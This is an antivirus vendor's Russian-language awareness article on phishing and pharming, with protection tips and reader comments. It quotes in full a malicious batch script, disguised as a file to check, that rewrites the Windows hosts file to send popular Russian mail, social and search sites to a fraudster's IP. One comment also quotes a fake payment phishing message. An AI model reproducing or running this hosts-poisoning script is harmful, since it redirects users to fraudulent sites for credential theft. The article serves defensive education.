-
добавить в избранное
Поскользнулся, упал, очнулся — гипс!
18 июля 2016
Кто не знает фишинг? Фишинг знают все! Действительно, о фишинге — интернет-мошенничестве с использованием почтовых рассылок с предложением товаров и услуг — известно подавляющему большинству пользователей. Естественно, уровень осведомленности растет, и они все более подозрительно относятся к приходящим письмам.
А злоумышленники, в свою очередь, придумывают новые уловки с целью выманивания денег у доверчивых и добрых людей.
Банк России выявил сайт Mngb.ru, незаконно предлагающий услуги от лица некоего Metro Neal Guardian Bank. Этой организации ЦБ не выдавал лицензию для работы в России, отмечается в релизе регулятора.
Между тем на сайте Mngb.ru сказано: «Генеральная лицензия на осуществление банковских операций № 1366, выдана Центральным Банком РФ 14.01.2015, бессрочная».
Утверждается, что центральный офис банка расположен в Вашингтоне, а представительство в России находится по адресу: Москва, Волоколамское шоссе, 90 строение 3. Между тем на московских картах по такому адресу банка не значится. В здании находится только государственное машиностроительное КБ имени И. И. Торопова «Вымпел».
На сайте также указан несуществующий ИНН. Мошенники предлагают оформить кредитные карты Visa и MasterCard.
Банк России призывает проверять информацию по зарегистрированным банкам на своем сайте.
Фарминг ("pharming" – производное от английских слов "phishing" и "farming" – занятие сельским хозяйством, животноводством).
Как и фишеры, люди, занимающиеся фармингом, используют мошеннические сайты, но жертвы попадают туда без добровольного клика по ссылке, а совершенно незаметно для себя.
Пользователи перенаправляются на мошеннический сайт автоматически — даже тогда, когда вводят правильный веб-адрес.
Для этого жулики используют вредоносное ПО, вносят изменения в файл hosts и настройки сервиса DNS. Так атака становится незаметной, а участие пользователя сводится к минимуму. В принципе, атака может быть даже целевой – злоумышленнику достаточно дождаться, когда пользователь решит посетить определенные сайты.
Насколько сложно выманить жертву на сайт фармера (не путать с фермером!)? Один из сценариев ловушки.
— Здравствуй ) У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?
— Могу, привет)
...
Ничего не подозревающий пользователь щелкает по этому файлу и… выполняется следующий код:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts
Кстати, перед собственно телом скрипта в файле 662 пустые строки.
В результате вместо всех указанных выше сайтов откроется сайт мошенников. #фишинг #мошенничество
Антивирусная правДА! рекомендует
Защититься от фарминга крайне сложно, сайты компаний изменяются постоянно, и пользователи не могут регулярно отслеживать такие изменения. Чтобы застраховаться от перенаправления на другой сайт, рекомендуется:
Контролировать попытки изменения файла Hosts, выбрав удобный для вас уровень работы Превентивной защиты Dr.Web Security Space.
Для настройки параметров Превентивной защиты кликните по значку
в системном меню, затем в открывшемся меню последовательно нажмите на 
и появившийся значок 
. В открывшемся окне Настройки выберите пункт Компоненты защиты и далее Превентивная защита.Здесь вы можете настроить реакцию антивируса на действия сторонних приложений, которые могут привести к заражению вашего компьютера.
- Изменения сетевых настроек возможны во многом благодаря тому, что пользователи работают с правами администраторов, и получившие доступ к компьютеру злоумышленники могут распоряжаться его настройками именно с этими правами. Не следует работать с правами администраторов после завершения настроек своего компьютера!
Регулярно проверяйте выписки со своего банковского счета. Развитие интернет-банкинга – это удобство не только для пользователей, но и для злоумышленников. Банки могут уведомлять клиентов обо всех или только подозрительных операциях, но эти сообщения могут быть скрыты или подделаны.
Только вы владеете достоверной информацией о том, где были потрачены деньги, поэтому не забывайте регулярно проверять баланс своего счета!
- Устанавливайте все обновления безопасности для операционной системы и используемого ПО.
- Не следует вводить личные сведения на сайте, на который вы попали по внешней ссылке или из всплывающего рекламного сообщения (даже на легитимном веб-сайте). Откройте новое окно браузера и введите ip-адрес ресурса (узнав его, например, на ином устройстве) вручную в адресной строке, чтобы убедиться в подлинности сайта. Прежде чем вводить личные данные, всегда проверяйте правильность URL страницы.
- Получив электронное письмо от имени банка, интернет-магазина, социальной сети или любой другой компании, убедитесь, что оно отправлено с официального электронного адреса организации. Для общения с клиентами банки не используют такие общедоступные домены как gmail.com, yahoo.co.uk и т. д.
- Гарантированно уничтожайте ненужную финансовую информацию. Пользователи часто выбрасывают бумаги с такими сведениями, в том числе распечатанные документы с данными интернет-банкинга, счета с записанными паролями и т. п. Любую личную информацию, включая выписки с банковского счета и карты с истекшим сроком действия, рекомендуется уничтожать путем измельчения.
- Сообщайте о случаях мошенничества в Интернете. В частности, это можно сделать непосредственно на сайте «Доктор Веб», отправив запрос в службу поддержки. Ваша информация важна не нам – она важна всем пользователям, которых стремятся поймать на удочку!
|
Оцените выпуск Чтобы проголосовать зайдите в аккаунт на сайте или создайте его, если аккаунта еще нет.
|
Сделайте репост
|
![[ВКонтакте]](http://st.drweb.com/static/new-www/social/no_radius/vkontakte.png)
![[Twitter]](http://st.drweb.com/static/new-www/social/no_radius/twitter.png)
Необходимо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.
Нам важно ваше мнение
Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.
Комментарии пользователей
Sergey
07:16:26 2020-03-18
Денисенко Павел Андреевич
20:30:50 2018-07-30
alex-diesel
18:36:51 2018-03-13
зы знаю, что не может быть идеала для каждого, но помечтать то можно ))
Toma
17:58:49 2017-11-27
eaglebuk
21:22:37 2017-02-11
Masha
09:41:06 2016-12-26
Пaвeл
14:31:10 2016-12-18
Laventurier
15:54:35 2016-12-06
kama35
10:06:33 2016-09-06
2018
20:03:15 2016-08-02
Часто встречался фишинг со страницей ответы.мэил.ру.
bob123456
17:54:26 2016-07-25
tigra
06:52:01 2016-07-21
vla_va
23:06:03 2016-07-18
В...а
22:34:11 2016-07-18
Р...й
21:40:39 2016-07-18
solec
21:28:15 2016-07-18
НинаК
21:05:01 2016-07-18
kva-kva
20:52:42 2016-07-18
Dvakota
20:28:28 2016-07-18
Sermut
19:43:24 2016-07-18
Александр Ш.
19:40:34 2016-07-18
А вот о возможных "фокусах" с файлом hosts наслышан. Кстати, любые сайты, которые открываются "сами по себе" для меня потенциально злонамеренные и не вызывают доверия. Будь то даже просто случай агрессивного маркетинга. :(
P.S. Рекомендации Dr.Web выше всяких похвал – в лучших традициях проекта. ;)
Viktoria
19:37:01 2016-07-18
mk.insta
19:36:26 2016-07-18
ada
19:32:34 2016-07-18
Dzhetrou
19:03:57 2016-07-18
La folle
18:48:16 2016-07-18
PROgrammeur
18:24:23 2016-07-18
Damir
18:21:12 2016-07-18
Zevs_46
17:08:43 2016-07-18
kseeleed
17:07:26 2016-07-18
Nikodim2011
17:03:20 2016-07-18
samox
16:53:02 2016-07-18
SGES
16:48:19 2016-07-18
Б...а
16:33:14 2016-07-18
Luger
15:52:40 2016-07-18
Людмила
15:12:17 2016-07-18
насчет контактов с производителями пока только так. http://products.drweb.ru/mobile/mnf/
вы думаете они хотят улучшить безопасность? они все хотят денег за установку нас. даже за то, что мы даем бесплатные лицензии.
razgen
15:05:23 2016-07-18
kindergod
14:35:58 2016-07-18
Людмила
14:26:56 2016-07-18
спасибо за это экспресс-исследование. мы учтем его в нашей работе.
Andromeda
12:47:39 2016-07-18
Неуёмный Обыватель
12:34:57 2016-07-18
******
Поступление средств на счет
Дата: 07.07.2016
Сумма: 33 990 RUB
Примечание: Партнерское вознаграждение
Получить средства => https://t.co/*УДАЛИЛ ЗДЕСЬ КУСОК*?yandex/dengi/destinypws/yandex/3111/19/19/whats/been/happening
-----
С уважением, ROBOKASSA
****
Тут и думать не надо, ничего хорошего по этой ссылке не ждет. я бы такие отправлял, например, когда не лениво. Ну а до того, экрана, который я послал, и так немного пользователей добирается :) Но увеличение объема материалов для исследования возрастет, возможно. Но с другой стороны, это ведь способствует конечной цели установки пользователем антивирусного продукта. Просто, кого-нибудь могут бомбить целенаправленно ссылками, а в общий эфир эти ссылки таки никогда не попадут, и соответственно, до аналитиков тоже иначе не дойдут. А так у пользователя будет шанс получить защиту от того, что его окружает
Альфа
12:31:05 2016-07-18
Вячeслaв
12:19:14 2016-07-18
Вячeслaв
12:15:24 2016-07-18
Tom
12:11:33 2016-07-18
Неуёмный Обыватель
11:58:13 2016-07-18
Это может увеличить число желающих поделиться подозрениями на плохие ссылки и файлы
dyadya_Sasha
11:53:46 2016-07-18
Совершенно согласен и 5-10% это очень оптимистичное предположение. Сам узнал первый раз о фишинге, когда проходил тесты вебIQметра. Очень правильно, что тема закрепляется в нескольких тестах. Потом Дайджесты, новости, Аправда и сейчас есть ощущение, что ты о фишинге знал всегда. ПОВТОРЕНИЕ мать УЧЕНИЯ! Рассказывая о фишинге своему окружению, всегда видел удивление, это для всех было ново, но осознания реальной опасности не было. Уверен, что спроси сейчас их, что такое фишинг, в лучшем случае, ответят что-то про рыбалку.
Диман
11:09:54 2016-07-18
Неуёмный Обыватель
11:06:32 2016-07-18
--
Я не прочь сообщать и даже рвусь это делать постоянно. Я получаю штук по 5 в день фишинговых ссылок. Но... Отправка запроса в службу поддержки через сайт очень муторное занятие. Было бы замечательно, если фишинговые ссылки можно было бы отправлять прямо из Dr.Web Security Space парой кликов из трея. Ну, например, нажать в "Инструменты" и ниже пункта "Поддержка" добавить пункт "Отправить подозрительную ссылку". Ну и для полного счастья "Отправить подозрительный файл". А то все эти заходы на сайт с заполнением многих полей не способствуют отправке
Ж...ч
10:59:44 2016-07-18